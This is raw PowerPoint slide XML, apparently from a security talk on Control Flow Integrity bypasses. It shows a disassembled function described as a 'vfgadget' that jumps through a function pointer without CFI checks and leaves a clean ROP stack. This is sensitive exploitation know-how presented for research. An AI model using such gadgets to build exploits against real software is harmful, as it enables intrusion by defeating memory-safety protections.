                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- Take 2 -</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10244" name="Picture 4" descr="street fighter &quot;round 2&quot; fightì ëí ì´ë¯¸ì§ ê²ìê²°ê³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783" y="1076121"/>
            <a:ext cx="6781887" cy="5086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5665512"/>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>One </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>vfgadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> to</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>rule them all</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6344815" y="1"/>
            <a:ext cx="5847185"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6512768" y="1866111"/>
            <a:ext cx="5587481" cy="3046988"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sub_1C5C620 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>near</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rcx</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FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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rax</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FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>30h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rax</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FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>28h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cl</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D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</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jz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>loc_1C5C639</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rdx</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rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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rcx</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FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdx+rcx-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>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rsi</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FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>38h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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rdi</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rax</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jmp</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rcx</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sub_1C5C620 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>endp</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1600" kern="100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279917" y="1825625"/>
            <a:ext cx="5617029" cy="4855093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NO CFI CHECKS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> instruction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Reads a function pointer and jumps to it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>With a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>clean RDI and RSI ROP stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Makes all the effort put into the implementation of the CFI useless</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2294244680"/>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mortal kombat fatalityì ëí ì´ë¯¸ì§ ê²ìê²°ê³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p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184988" y="587829"/>
            <a:ext cx="4572000" cy="307910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3601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TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194319" y="501132"/>
            <a:ext cx="2995127" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Control Flow Integrity</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4100155786"/>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>One </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>vfgadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> to</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>rule them all</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6344815" y="1"/>
            <a:ext cx="5847185"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6512768" y="1866111"/>
            <a:ext cx="5587481" cy="3046988"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sub_1C5C620 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>near</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rcx</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FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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rax</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FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>30h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rax</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FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>28h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cl</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D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</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jz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>loc_1C5C639</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rdx</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rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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rcx</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FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdx+rcx-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>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rsi</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a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>38h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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mov</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rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</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rax</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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rcx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sub_1C5C620 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
